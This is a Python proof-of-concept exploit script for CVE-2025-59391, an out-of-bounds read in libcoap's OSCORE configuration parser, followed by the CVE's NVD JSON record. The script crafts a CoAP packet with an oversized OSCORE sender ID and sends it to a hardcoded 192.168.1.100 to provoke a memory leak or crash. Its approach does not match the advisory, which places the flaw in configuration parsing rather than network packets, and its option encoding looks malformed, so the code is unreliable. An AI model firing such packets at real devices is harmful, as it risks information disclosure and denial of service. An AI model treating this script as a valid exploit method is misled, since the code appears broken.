CVE-2025-59391

# CVE-2025-59391 PoC - libcoap OSCORE Configuration Parser OOB Read # This PoC demonstrates triggering an out-of-bounds read in libcoap's OSCORE parser import struct import socket def create_malicious_config(): """Generate malicious OSCORE configuration to trigger OOB read""" # Craft an OSCORE configuration with oversized ID fields config = bytearray() # OSCORE option header config += bytes([0xAB]) # Option number for OSCORE # Malformed OSCORE payload with oversized sender_id # sender_id length exceeds expected buffer size oversized_id = b'A' * 512 # 512 bytes when parser expects much less # Construct payload that triggers the vulnerable parsing path payload = bytearray() payload += bytes([0x01]) # OSCORE flag byte payload += struct.pack('>H', len(oversized_id)) # Length prefix payload += oversized_id payload += bytes([0x02, 0x03]) # Additional malformed fields config += bytes([len(payload)]) # Option length config += payload return bytes(config) def send_exploit(target_host, target_port=5683): """Send malicious CoAP packet with OSCORE configuration""" pkt = bytearray() # CoAP Header pkt += bytes([0x40, 0x03]) # Version 1, CON, POST pkt += bytes([0x00, 0x01]) # Message ID pkt += bytes([0x00]) # Token length = 0 # URI-Path option (required for OSCORE request) pkt += bytes([0x03, 0x01, 0x2E]) # OSCORE option pkt += create_malicious_config() # Payload marker pkt += bytes([0xFF]) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) try: sock.sendto(pkt, (target_host, target_port)) response, addr = sock.recvfrom(4096) return response except socket.timeout: return None finally: sock.close() if __name__ == "__main__": target = "192.168.1.100" result = send_exploit(target) print(f"[*] Sent malicious OSCORE config to {target}") if result: print(f"[*] Response received: {result.hex()}") print("[*] Potential OOB read triggered - analyze response for leaked memory") else: print("[*] No response - target may have crashed or is filtering")

{"cve": {"id": "CVE-2025-59391", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:20.080", "lastModified": "2025-12-12T12:34:00.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory disclosure vulnerability exists in libcoap's OSCORE configuration parser in libcoap before release-4.3.5-patches. An out-of-bounds read may occur when parsing certain configuration values, allowing an attacker to infer or read memory beyond string boundaries in the .rodata section. This could potentially lead to information disclosure or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3.5a", "matchCriteriaId": "8519F781-B2B5-48CA-BE86-B187221928B6"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/pull/1730", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/obgm/libcoap/releases/tag/v4.3.5a", "source": "[email protected]", "tags": ["Release Notes"]}]}}